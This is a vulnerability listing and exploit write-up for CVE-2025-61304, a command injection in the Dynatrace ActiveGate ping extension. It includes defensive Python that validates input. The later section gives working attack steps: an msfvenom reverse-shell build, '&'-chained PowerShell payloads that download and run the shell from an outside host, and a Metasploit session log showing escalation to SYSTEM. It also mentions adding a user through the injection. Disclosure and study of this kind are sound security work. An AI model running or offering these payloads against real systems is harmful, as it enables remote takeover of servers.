| Title | Published | Views | Family |
|---|---|---|---|
| Exploit for CVE-2025-61304 | 25 Oct 2025 12:42 | – | githubexploit |
| CVE-2025-61304 | 25 Oct 2025 10:42 | – | circl |
| Dynatrace ActiveGate security vulnerability | 5 Nov 2025 00:00 | – | cnnvd |
| CVE-2025-61304 | 5 Nov 2025 00:00 | – | cve |
| CVE-2025-61304 | 5 Nov 2025 00:00 | – | cvelist |
| EUVD-2025-37901 | 5 Nov 2025 00:00 | – | euvd |
| CVE-2025-61304 | 5 Nov 2025 16:15 | – | nvd |
| CVE-2025-61304 | 5 Nov 2025 16:15 | – | osv |
| PT-2025-45113 | 5 Nov 2025 00:00 | – | ptsecurity |
| CVE-2025-61304 | 6 Nov 2025 00:10 | – | redhatcve |

# CVE-2025-61304
"OS command injection vulnerability in Dynatrace ActiveGate ping extension up to 1.016 via crafted ip address"
In the background, the ping extension uses the Windows command prompt to perform the ping. The input field for the Test Target Host is also 1024 characters long. After the IP address you can append additional commands for the ActiveGate to execute, simply by separating them with an '&'.
Reported to Dynatrace and fixed with this commit:
https://github.com/Dynatrace/dynatrace-api/pull/99
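
The root cause described above is user-supplied text reaching `cmd.exe`, where `&` separates commands. As an added example (not the extension's code and not the Dynatrace fix in the linked pull request), the following Python validates a ping target as an IP address or hostname and builds an argument list that is executed without a shell; all function names and sample targets are assumptions constructed for illustration.

```python
import ipaddress
import re
import subprocess

# Hypothetical vulnerable pattern (assumed, not taken from the extension):
#   subprocess.run("ping -n 4 " + target, shell=True)   # cmd.exe treats '&' as a separator

# RFC 1123 label: letters, digits, hyphen; no leading or trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def validate_target(target: str) -> str:
    """Return a safe ping target (IP address or hostname) or raise ValueError."""
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass  # not an IP literal, fall through to the hostname check
    name = target[:-1] if target.endswith(".") else target
    if 0 < len(name) <= 253 and all(_LABEL.fullmatch(p) for p in name.split(".")):
        return target
    raise ValueError(f"rejected ping target: {target!r}")


def build_ping_argv(target: str, count: int = 4) -> list[str]:
    # Windows ping syntax ("-n" is the echo count), matching the Windows host on this page.
    return ["ping", "-n", str(int(count)), validate_target(target)]


def ping(target: str) -> int:
    # A list with shell=False (the default) starts ping directly; no shell parses the input.
    return subprocess.run(build_ping_argv(target), capture_output=True, timeout=30).returncode


# Constructed sample inputs: three valid targets, four that must be rejected.
SAMPLES = ["192.0.2.10", "2001:db8::1", "gateway.example.com",
           "192.0.2.10&echo injected", "-t", "host name", ""]


def classify_samples() -> dict[str, bool]:
    """Map each constructed sample to True (accepted) or False (rejected)."""
    result = {}
    for sample in SAMPLES:
        try:
            validate_target(sample)
            result[sample] = True
        except ValueError:
            result[sample] = False
    return result


if __name__ == "__main__":
    for sample, ok in classify_samples().items():
        print(f"{sample!r:32} {'accepted' if ok else 'rejected'}")
```

The leading-hyphen rule also stops a target such as `-t` from being read by `ping` as an option, which avoiding the shell alone does not prevent.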
Exploit RCE to add user:
<img width="1261" height="957" alt="add_user" src="https://github.com/user-attachments/assets/acbfdc73-fe90-4c29-b106-70a283695230" />
Local user list before and after:
<img width="1274" height="746" alt="exploit" src="https://github.com/user-attachments/assets/344948ae-08d6-431c-9101-aa0be2633998" />
# Other example payloads:
1. Create a meterpreter reverse shell:
```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.51.200 LPORT=4444 -f exe > mshell.exe
```
2. Download and Execute the shell on the ActiveGate through the Cloud interface using the ping extension:
```
google&powershell.exe $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest http://192.168.51.200/mshell.exe -OutFile c:\test\mshell.exe
google&c:\test\mshell.exe
```
3. Resulting session
```
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.51.200:4444
[*] Sending stage (200262 bytes) to 192.168.51.54
[*] Meterpreter session 3 opened (192.168.51.200:4444 -> 192.168.51.54:49800 ) at 2023-01-21 19:02:16 +0100
meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-9493M3CRTDV
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
```